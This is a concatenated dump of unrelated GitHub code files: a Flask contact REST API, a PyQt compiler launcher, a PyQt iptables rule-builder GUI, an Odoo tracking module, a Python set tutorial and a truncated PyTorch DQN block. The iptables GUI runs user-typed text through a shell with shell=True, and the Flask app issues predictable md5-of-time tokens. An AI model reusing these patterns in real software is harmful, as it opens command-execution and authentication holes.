None:\n\t\t\t\t\tUserObj(name=args['name'])\n\t\t\t\treturn {'id': args['name']}, 201\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n# Set token, only demostration\nclass Token(Resource):\n\n\tdef get(self):\n\t\ttoken = md5.new( 
str(time.time())).hexdigest()\n\t\tTokenObj(token=token)\n\t\treturn {'Token': token }\n\t\n\tdef put(self):\n\t\treturn {'Error':'Forbidden'}, 403\n\n\tdef post(self):\n\t\treturn {'Error':'Forbidden'}, 403\n\n\tdef delete(self):\n\t\treturn {'Error':'Forbidden'}, 403\n\n\n\nclass Contact(Resource):\n\n\tdef put(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['data'] != '' and args['id'] != '' and args['datatype'] != '':\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcontact = ContactObj.get(args['id'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'Contact Not Found'}, 404\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = UserObj.get(args['user'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\t\tcontact.set(data=args['data'])\n\t\t\t\t\tcontact.set(datatype=args['datatype'])\n\t\t\t\t\tcontact = ContactObj.get(args['id'])\n\t\t\t\treturn {'id': contact.id, 'data': contact.data, 'datatype': contact.datatype}, 200\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\tdef delete(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['id'] != '':\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcontact = ContactObj.get(args['id'])\n\t\t\t\t\t\tContactObj.delete(contact.id)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'Bad Request'}, 400\n\n\t\t\t\treturn {'message': 'Done'}, 200\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\n\tdef get(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['user'] is not None:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = UserObj.get(args['user'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\tret = dict()\n\t\t\t\tcontact = ContactObj.select(ContactObj.q.user==user)\n\t\t\t\tfor i in xrange(0,contact.count()):\n\t\t\t\t\tret[i] = {'id':contact[i].id,'data': contact[i].data ,'datatype': contact[i].datatype }\n\t\t\t\treturn ret, 200\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\tdef post(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['user'] is not None:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = UserObj.get(args['user'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\tif args['data'] != '' and args['datatype'] != '':\n\t\t\t\t\tcontact = ContactObj(data=args['data'],user=user,datatype=args['datatype'])\n\t\t\t\treturn {'id': contact.id , 'user': user.name}, 201\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\n\napi.add_resource(Contact, '/contact', '/contact/')\napi.add_resource(User, '/user', '/user/')\napi.add_resource(Token, '/gettoken','/gettoken/')\n\n\ndef db_open(filename):\n    create = False\n    filename = os.path.abspath(filename)\n    string_conn = 'sqlite:' + filename\n    conn = sqlobject.connectionForURI(string_conn)\n    sqlobject.sqlhub.processConnection = conn\n    UserObj.createTable(ifNotExists=True)\n    TokenObj.createTable(ifNotExists=True)\n    ContactObj.createTable(ifNotExists=True)\n\n\n\ndef main():\n\tdb_open(\"myapp.db\")\n\tapp.run(debug=True, host='localhost', 
port=8080)\n\nif __name__ == '__main__':\n\tmain()\n\n\n","repo_name":"truravel88/REST-python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73631537012","text":"\"\"\"\n@ Author: 2054435 廖偲宇\n@ Date: 2023-04-29\n@ Version: 1.0\n@ Description: compiler main program (integration entry point)\n\"\"\"\n\nfrom UI_Manager.ui_startup import *\nfrom UI_Manager.ui_main import *\n\n\ndef main():\n    c_compiler = QtWidgets.QApplication(sys.argv)  # create the QApplication object\n    c_compiler.processEvents()  # flush pending events so the app stays responsive while the splash screen shows\n\n    open_splash = UI_Splash()  # create the splash screen object\n    open_splash.effect()\n\n    c_compiler_surface = QtWidgets.QMainWindow()\n    ui = UI_Main()\n    ui.__init_ui__(c_compiler_surface)\n    c_compiler_surface.show()\n    open_splash.finish(c_compiler_surface)  # call the splash screen's finish() to end the splash effect\n    sys.exit(c_compiler.exec_())\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"LiaoSiyuu/A-C-Like-Compiler","sub_path":"project_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"10033060175","text":"# coding: utf-8\nimport subprocess\nimport os\nimport sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5 import uic\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import *\nimport socket\niptlist = [\"iptables\",\"-A\",\"INPUT\",\"-p\",\"프로토콜\",\"--dport\",\"포트번호\",\"-s\",\"소스\",\"-j\",\"ACCEPT\",\"서비스\",\"--icmp-type\",\"icmp종류\"]\n#              0       1     2      3      4           5         6        7     8     9     10       11         12            13\ntable = [iptlist[1],iptlist[11],iptlist[4],iptlist[6],iptlist[8],iptlist[10]]\n#            0          1          2          3          4          5\n\nglobal string, row, sume\nstring = \"\"\nrow = 0\nsume = [\"0\"]\ndef combine(index, value):\n    iptlist[index] = value\n\ndef getsume():\n    return int(sume[0])\n\ndef setsume(row):\n    sume[0] = str(row)\n\n\nclass MainWindow(QMainWindow):\n    def __init__(self, parent=None):\n        QtWidgets.QDialog.__init__(self, parent)\n        self.ui = uic.loadUi(\"test2.ui\", self)\n        # load the .ui file directly into this python class\n        header = self.tableWidget.horizontalHeader()\n        header.setSectionResizeMode(3, QtWidgets.QHeaderView.ResizeToContents)\n        self.accept.clicked.connect(self.accept_change)\n        # connect each clicked event to its handler function\n        self.fileopen.clicked.connect(self.fileopen_clicked)\n        self.filesave.clicked.connect(self.filesave_clicked)\n        self.bt_ctrule.clicked.connect(self.bt_ctrule_clicked)\n        self.iptable_L.clicked.connect(self.iptable_L_clicked)\n        self.iptable_F.clicked.connect(self.iptable_F_clicked)\n        self.ruleaccept.clicked.connect(self.ruleaccept_clicked)\n        self.tableclear.clicked.connect(self.tableclear_clicked)\n        self.btflagcut.clicked.connect(self.btflagcut_clicked)\n        self.btflagcutdel.clicked.connect(self.btflagcutdel_clicked)\n        self.btpvipcut.clicked.connect(self.btpvipcut_clicked)\n        self.btpvipcutdel.clicked.connect(self.btpvipcutdel_clicked)\n        self.btallcut.clicked.connect(self.btallcut_clicked)\n        self.btallcutdel.clicked.connect(self.btallcutdel_clicked)\n        self.ui.show()\n        self.Csource.activated[str].connect(self.changeSource)\n        self.Ccmd.activated[str].connect(self.changeCmd)\n        self.Cservice.activated[str].connect(self.changeService)\n        self.Cdecision.activated[str].connect(self.changeDecision)\n        self.Cicmptype.activated[str].connect(self.changeicmptype)\n\n\n\n    def changeService(self, text):\n        if text == \"사용자지정TCP규칙\":\n            protocol = \"TCP\"\n            port = \"\"\n            
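# mirror the chosen preset into the protocol/port text fields\n            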
self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"사용자지정UDP규칙\":\n protocol = \"UDP\"\n port = \"\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"사용자지정프로토콜\":\n protocol = \"\"\n port = \"0:65535\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"모든TCP\":\n protocol = \"TCP\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"모든UDP\":\n protocol = \"UDP\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"ICMP\":\n protocol = \"ICMP\"\n port = \"\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"모든ICMP-IPv6\":\n protocol = \"IPV6 ICMP\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"모든트래픽\":\n protocol = \"모두\"\n port = \"0:65535\"\n source = \"0.0.0.0/0\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n self.Tsource.setText(source)\n combine(4,protocol)\n combine(6,port)\n combine(8,source)\n combine(11, text)\n if text == \"SSH\":\n protocol = \"TCP\"\n port = \"22\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"SMTP\":\n protocol = \"TCP\"\n port = \"25\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"HTTP\":\n protocol = \"TCP\"\n port = \"80\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"POP3\":\n protocol = \"TCP\"\n port = \"110\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"IMAP\":\n protocol = \"TCP\"\n port = \"143\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"DNS(UDP)\":\n protocol = \"UDP\"\n port = \"53\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"DNS(TCP)\":\n protocol = \"TCP\"\n port = \"53\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"Telnet\":\n protocol = \"TCP\"\n port = \"23\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4,protocol)\n combine(6,port)\n combine(11, text)\n if text == \"TFTP\":\n protocol = \"TCP\"\n port = \"69\"\n self.Tprotocol.setText(protocol)\n self.Tport.setText(port)\n combine(4, protocol)\n combine(6, port)\n combine(11, text)\n if text == \"FTP\":\n protocol = \"TCP\"\n port = \"21\"\n self.Tprotocol.setText(protocol)\n 
self.Tport.setText(port)\n            combine(4,protocol)\n            combine(6,port)\n            combine(11, text)\n        if text == \"SNMP\":\n            protocol = \"TCP\"\n            port = \"161\"\n            self.Tprotocol.setText(protocol)\n            self.Tport.setText(port)\n            combine(4,protocol)\n            combine(6,port)\n            combine(11, text)\n\n\n    def changeDecision(self, text):\n        if text == \"허용\":\n            decision = \"ACCEPT\"\n            combine(10,decision)\n        if text == \"거부\":\n            decision = \"DROP\"\n            combine(10,decision)\n\n    def changeCmd(self, text):\n        if text == \"추가\":\n            cmd = \"-A\"\n            combine(1,cmd)\n        if text == \"삭제\":\n            cmd = \"-D\"\n            combine(1,cmd)\n\n    def changeSource(self, text):\n        source = \"\"\n        if text == \"위치무관\":\n            source = '0.0.0.0/0'\n            self.Tsource.setText(source)\n            combine(8, source)\n\n        if text == \"내IP\":\n            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n            s.connect(('8.8.8.8',1))\n            source = s.getsockname()[0]\n            self.Tsource.setText(str(source))\n            combine(8, source)\n\n        if text == \"사용자지정\":\n            self.Tsource.setText(\"\")\n            combine(8, source)\n\n    def changeicmptype(self, text):\n        if text == \"echo-reply\":\n            icmptype = text\n            combine(13,text)\n        elif text == \"destination-unreachable\":\n            icmptype = text\n            combine(13,text)\n        elif text == \"redirect\":\n            icmptype = text\n            combine(13,text)\n        elif text == \"echo-request\":\n            icmptype = text\n            combine(13,text)\n        elif text == \"time-exceeded\":\n            combine(13,text)\n            icmptype = text\n        print(icmptype)\n\n\n    @pyqtSlot()\n    def bt_ctrule_clicked(self):\n        #iptables = [\"iptables\", \"<command>\", \"INPUT\", \"-p\", \"<protocol>\", \"--dport\", \"<port>\", \"-s\", \"<source>\", \"-j\", \"<decision>\"]\n        iptlist[4] = self.Tprotocol.text()\n        iptlist[6] = self.Tport.text()\n        iptlist[8] = self.Tsource.text()\n\n        table[0] = iptlist[1]\n        table[1] = iptlist[11]\n        table[2] = iptlist[4]\n        table[3] = iptlist[6]\n        table[4] = iptlist[8]\n        table[5] = iptlist[10]\n\n\n        if table[0] == \"-A\":\n            table[0] = \"추가\"\n        elif table[0] == \"-D\":\n            table[0] = \"삭제\"\n\n        if table[5] == \"ACCEPT\":\n            table[5] = \"허용\"\n        elif table[5] == \"DROP\":\n            table[5] = \"차단\"\n\n        if table[1] ==\"사용자지정TCP규칙\":\n            table[1] = \"커스텀TCP\"\n        elif table[1] == \"사용자지정UDP규칙\":\n            table[1] = \"커스텀UDP\"\n\n        if table[2] ==\"ICMP\":\n            table[3] = iptlist[13]\n\n        row = getsume()\n        rowPosition = self.tableWidget.rowCount()\n        self.tableWidget.insertRow(rowPosition)\n        for i in range(6):\n            item = QTableWidgetItem(table[i])\n            # wrap the cell value in a table item object\n            self.tableWidget.setItem(row,i,item)\n            # insert the item object into the table\n\n        row = row +1\n        setsume(row)\n\n\n\n        temp = [\"iptables\", \"-A\", \"INPUT\", \"-P\", \"프로토콜\", \"--dport\", \"포트번호\", \"-s\", \"소스\", \"-j\", \"ACCEPT\"]\n        #            0       1     2       3      4           5         6        7     8     9     10\n        for i in range(11):\n            temp[i] = iptlist[i]\n\n        if temp[4] == \"ICMP\":\n            temp[5] = \"--icmp-type\"\n            temp[6] = iptlist[13]\n\n        input = \" \".join(temp)\n\n        text = self.consol.toPlainText() +'\\n'+ input\n        self.consol.setPlainText(text)\n\n    @pyqtSlot()\n    def fileopen_clicked(self):\n        fname = QFileDialog.getOpenFileName(self)\n        load = 'iptables-restore < '+fname[0]\n        result = subprocess.call(load, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        L = 'iptables -L --line-numbers'\n        show = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        self.tbview.setPlainText(str(show))\n        #fname[0] is the selected file path\n\n    @pyqtSlot()\n    def filesave_clicked(self):\n        save = 'iptables-save > /home/leehoogy/iptables.rules'\n        result = subprocess.call(save, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        QMessageBox.about(self,\"message box\",\"save complete.\")\n\n    @pyqtSlot()\n    def 
iptable_L_clicked(self):\n        L = 'iptables -L --line-numbers'\n        result = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        self.tbview.setPlainText(str(result))\n\n    @pyqtSlot()\n    def iptable_F_clicked(self):\n        F = 'iptables -F'\n        result = subprocess.call(F, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        L = 'iptables -L --line-numbers'\n        show = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        self.tbview.setPlainText(str(show))\n\n    @pyqtSlot()\n    def ruleaccept_clicked(self):\n        text = self.consol.toPlainText()\n        result = subprocess.call(text, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        L = 'iptables -L --line-numbers'\n        show = subprocess.check_output(L, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        self.tbview.setPlainText(str(show))\n\n    @pyqtSlot()\n    def tableclear_clicked(self):\n        while (self.tableWidget.rowCount() > 0):\n            self.tableWidget.removeRow(0)\n        row = 0\n        setsume(row)\n        self.consol.setPlainText(\"\")\n\n    @pyqtSlot()\n    def accept_change(self):\n        text = self.lineEdit.text()\n        test = subprocess.check_output(text, shell=True, universal_newlines=True, stderr=subprocess.STDOUT)\n        self.tbview.setPlainText(str(test))\n\n    @pyqtSlot()\n    def btflagcut_clicked(self):\n        flagcut = \"iptables -A INPUT -p TCP --tcp-flags ACK,FIN FIN -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL NONE -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL PSH,FIN -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL URG,PSH,FIN -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,PSH -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,RST -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,RST,PSH -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,FIN,ACK,RST -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN,RST,PSH -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags FIN,RST FIN,RST -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags SYN,FIN SYN,FIN -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ACK,PSH PSH -j DROP\\n\" \\\n                  \"iptables -A INPUT -p TCP --tcp-flags ACK,URG URG -j DROP\"\n        print(flagcut)\n        text = self.consol.toPlainText()\n        text = text+\"\\n\"+flagcut\n        self.consol.setPlainText(text)\n\n    @pyqtSlot()\n    def btflagcutdel_clicked(self):\n        flagcutdel = \"iptables -D INPUT -p TCP --tcp-flags ACK,FIN FIN -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL NONE -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL PSH,FIN -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL URG,PSH,FIN -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,PSH -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,RST -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,RST,PSH -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,FIN,ACK,RST -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ALL SYN,ACK,FIN,RST,PSH -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags FIN,RST FIN,RST -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags SYN,FIN SYN,FIN -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ACK,PSH PSH -j DROP\\n\" \\\n                     \"iptables -D INPUT -p TCP --tcp-flags ACK,URG URG -j DROP\"\n        
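# echo the rule batch to stdout, then append it to the console box\n        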
print(flagcutdel)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + flagcutdel\n self.consol.setPlainText(text)\n\n @pyqtSlot()\n def btpvipcut_clicked(self):\n pvipcut = \"iptables -A INPUT -i eth0 -s 10.0.0.0/8 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 172.16.0.0/12 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 192.168.0.0/16 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 224.0.0.0/4 -j DROP\\n\" \\\n \"iptables -A INPUT -i eth0 -s 240.0.0.0/5 -j DROP\"\n print(pvipcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + pvipcut\n self.consol.setPlainText(text)\n\n @pyqtSlot()\n def btpvipcutdel_clicked(self):\n pvipcut = \"iptables -D INPUT -i eth0 -s 10.0.0.0/8 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 172.16.0.0/12 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 192.168.0.0/16 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 224.0.0.0/4 -j DROP\\n\" \\\n \"iptables -D INPUT -i eth0 -s 240.0.0.0/5 -j DROP\"\n print(pvipcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + pvipcut\n self.consol.setPlainText(text)\n\n def btallcut_clicked(self):\n allcut = \"iptables -A INPUT -j DROP\"\n print(allcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + allcut\n self.consol.setPlainText(text)\n\n def btallcutdel_clicked(self):\n allcut = \"iptables -D INPUT -j DROP\"\n print(allcut)\n text = self.consol.toPlainText()\n text = text + \"\\n\" + allcut\n self.consol.setPlainText(text)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n mainwindow = MainWindow()\n app.exec()","repo_name":"lugan1/network_programming","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":18055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22970655529","text":"from odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\nimport re, operator\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass TrackingCard(models.Model):\n _name = 'vnitpro.tracking.card'\n\n name = fields.Char('Name', compute='compute_name')\n delivery_plan_id = fields.Many2one('vnitpro.delivery.plan', 'Delivery Plan', required=True)\n contract_id = fields.Many2one('vnitpro.product.information', 'Contract',\n domain=\"[('delivery_plan_id','=',delivery_plan_id)]\", required=True)\n order_id = fields.Many2one('vnitpro.order', 'Order',\n domain=\"[('contract_id','=',contract_id),('status','=','draft')]\", required=True)\n customer_name = fields.Char('Customer Name', related='order_id.customer_name', readonly=True)\n product_group_id = fields.Many2one('vnitpro.product.group', 'Product', related='contract_id.product_group_id',\n readonly=True)\n delivery_formality_id = fields.Many2one('vnitpro.delivery.formality', 'Delivery Formality',\n related='contract_id.delivery_formality_id', readonly=True)\n weight_needed = fields.Float('Weight Needed', related='contract_id.weight', readonly=True)\n unit_id = fields.Many2one('vnitpro.unit', 'Unit', related='product_group_id.unit_id', readonly=True)\n expected_price = fields.Float('Expected Price', related='contract_id.expected_price', readonly=True)\n currency_id = fields.Many2one('vnitpro.currency', 'Currency', readonly=True)\n tracking_card_information_ids = fields.One2many('vnitpro.tracking.card.information', 'tracking_card_id',\n 'Tracking Card Information')\n total_weight_delivery = fields.Float('Total Weight Delivery', compute='compute_total', track_visibility='onchange')\n total_weight_left = 
fields.Float('Total Weight Left', compute='compute_total', track_visibility='onchange')\n total_cost = fields.Float('Total Cost', compute='compute_total', track_visibility='onchange')\n status = fields.Selection([('draft', 'Draft'),\n ('done', 'Done')], 'Status', default='draft', track_visibility='onchange')\n\n _sql_constraints = [('unique_contract', 'unique(contract_id)', 'The tracking card already exists!')]\n\n @api.multi\n def confirm_order(self):\n self.status = 'done'\n self.order_id.status = 'done'\n\n @api.multi\n def check_product(self):\n self.tracking_card_information_ids = False\n for record in self.order_id.order_detail_ids:\n self.currency_id = record.currency_id\n unit_price = record.unit_price\n break\n export_card_list = []\n weight_left = self.weight_needed\n inventory_export_cards = self.env['vnitpro.inventory.export.product.detail'].search(\n [('inventory_export_product_id.contract_id', '=', self.contract_id.id),\n ('product_group_id', '=', self.product_group_id.id),\n ('inventory_export_product_id.order_id', '=', self.order_id.id)])\n direct_export_cards = self.env['vnitpro.direct.import.product.detail'].search(\n [('direct_import_product_id.contract_id', '=', self.contract_id.id),\n ('product_group_id', '=', self.product_group_id.id),\n ('direct_import_product_id.order_id', '=', self.order_id.id)])\n for record in inventory_export_cards:\n export_card = {\n 'export_card_number': record.inventory_export_product_id.export_card_number,\n 'export_date': record.inventory_export_product_id.export_date,\n 'product_group_id': record.product_group_id,\n 'weight_delivery': record.present_quantity,\n 'currency_id': self.currency_id.id,\n 'cost': record.present_quantity * unit_price,\n }\n export_card_list.append(export_card)\n for record in direct_export_cards:\n export_card = {\n 'export_card_number': record.direct_import_product_id.export_card_number,\n 'export_date': record.direct_import_product_id.export_date,\n 'product_group_id': record.product_group_id,\n 'weight_delivery': record.present_quantity,\n 'currency_id': self.currency_id.id,\n 'cost': record.present_quantity * unit_price,\n }\n export_card_list.append(export_card)\n export_card_list.sort(key=operator.itemgetter('export_date'))\n for record in export_card_list:\n weight_left -= record['weight_delivery']\n record.update({'weight_left': weight_left})\n self.tracking_card_information_ids = export_card_list\n\n @api.one\n @api.depends('order_id')\n def compute_name(self):\n self.name = _('Tracking Card') + ' ' + self.order_id.code\n\n @api.multi\n @api.depends('tracking_card_information_ids')\n def compute_total(self):\n for record in self.tracking_card_information_ids:\n self.total_weight_delivery += record.weight_delivery\n self.total_weight_left = record.weight_left\n self.total_cost += record.cost\n\n\nclass TrackingCardInformation(models.Model):\n _name = 'vnitpro.tracking.card.information'\n\n tracking_card_id = fields.Many2one('vnitpro.tracking.card', 'Tracking Card', required=True, ondelete='cascade')\n\n export_card_number = fields.Char('Export Card Number', readonly=True)\n export_date = fields.Date('Export Date', readonly=True)\n product_group_id = fields.Many2one('vnitpro.product.group', 'Product', readonly=True)\n unit_id = fields.Many2one('vnitpro.unit', 'Unit', related='product_group_id.unit_id', readonly=True)\n weight_delivery = fields.Float('Weight Delivery', readonly=True)\n weight_left = fields.Float('Weight Left', readonly=True)\n cost = fields.Float('Cost', readonly=True)\n currency_id = 
fields.Many2one('vnitpro.currency', 'Currency', readonly=True)\n    reversed = fields.Float('Reversed', compute='compute_reversed')\n\n    @api.one\n    def compute_reversed(self):\n        import_quantity = export_quantity = 0\n        import_inven_list = self.env['vnitpro.inventory.import.product.detail'].search(\n            [('product_group_id', '=', self.product_group_id.id),\n             ('inventory_import_product_id.import_date', '<=', self.export_date)])\n        export_inven_list = self.env['vnitpro.inventory.export.product.detail'].search(\n            [('product_group_id', '=', self.product_group_id.id),\n             ('inventory_export_product_id.export_date', '<=', self.export_date)])\n        for record in import_inven_list:\n            import_quantity += record.quantity\n        for record in export_inven_list:\n            export_quantity += record.present_quantity\n        self.reversed = import_quantity - export_quantity\n","repo_name":"tu2305/VNITPro_erp","sub_path":"vnitpro_consume/models/tracking_card.py","file_name":"tracking_card.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"39662317952","text":"# Creating an empty set\nb = set()\nprint(type(b))\n\n# Adding values to an empty set\nb.add(4)\nb.add(5)\nb.add(5) # adding a value that is already present does not change the set\n\nprint(b)\n\n# Let's check whether we can add a list to this set\ntry:\n    b.add([4,5,6])\nexcept TypeError as err:\n    print(err)  # \"unhashable type: 'list'\" - lists (and dicts) cannot be set elements\n\nprint(b) \n# A tuple is hashable, though: b.add((4,5,6)) works fine.\n\n# b.remove(5) removes 5 from b\n# b.remove(15) raises KeyError because 15 is not in the set\n ","repo_name":"mehulbatra08/Python_Addy","sub_path":"class 5/06_set_methods.py","file_name":"06_set_methods.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"41799055066","text":"from typing import Tuple\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass DQNImageBlock(nn.Module):\n    def __init__(\n        self,\n        in_shape: Tuple[int, ...],\n        filters: int = 32,\n        activation=\"ReLU\",\n        enable_time_distributed_layer: bool = False,\n    ):\n        super().__init__()\n        self.enable_time_distributed_layer = enable_time_distributed_layer\n\n        if isinstance(activation, str):\n            activation = getattr(nn, activation)\n\n        in_ch = in_shape[-3]\n\n        # (batch, in_ch, 84, 84)\n        # -> (batch, 32, 21, 21)\n        # -> (batch, 64, 11, 11)\n        # -> (batch, 64, 11, 11)\n        self.image_layers = nn.ModuleList(\n            [\n                nn.Conv2d(\n                    in_ch,\n                    filters,\n                    kernel_size=8,\n                    stride=4,\n                    padding=3,\n                    padding_mode=\"replicate\",\n                ),\n                activation(inplace=True),\n                nn.Conv2d(\n                    filters,\n                    filters * 2,\n                    kernel_size=4,\n                    stride=2,\n                    padding=2,\n                    